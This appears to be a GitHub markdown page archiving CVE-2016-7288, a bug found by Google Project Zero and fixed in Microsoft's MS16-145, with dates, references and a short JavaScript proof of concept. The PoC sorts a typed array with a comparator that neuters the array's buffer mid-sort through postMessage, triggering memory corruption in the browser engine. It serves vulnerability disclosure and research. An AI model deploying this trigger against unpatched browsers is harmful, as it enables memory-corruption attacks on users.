CVE-2016-7288

Report: Nov 2016
Fix: Dec 2016
Credit: Natalie Silvanovich, Google Project Zero

PoC

var buf = new ArrayBuffer( 0x10010);
var numbers = new Uint8Array(buf);

function v(){
   // neuter buf
   postMessage("test", "http://127.0.0.1", [buf])
   return 7;
}

function compareNumbers(a, b) {
  return {valueOf : v};
}

numbers.sort(compareNumbers);

Reference

Microsoft (MS16-145)
Project Zero

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

CVE-2016-7288.md

CVE-2016-7288.md

CVE-2016-7288

PoC

Reference

Files

CVE-2016-7288.md

Latest commit

History

CVE-2016-7288.md

File metadata and controls

CVE-2016-7288

PoC

Reference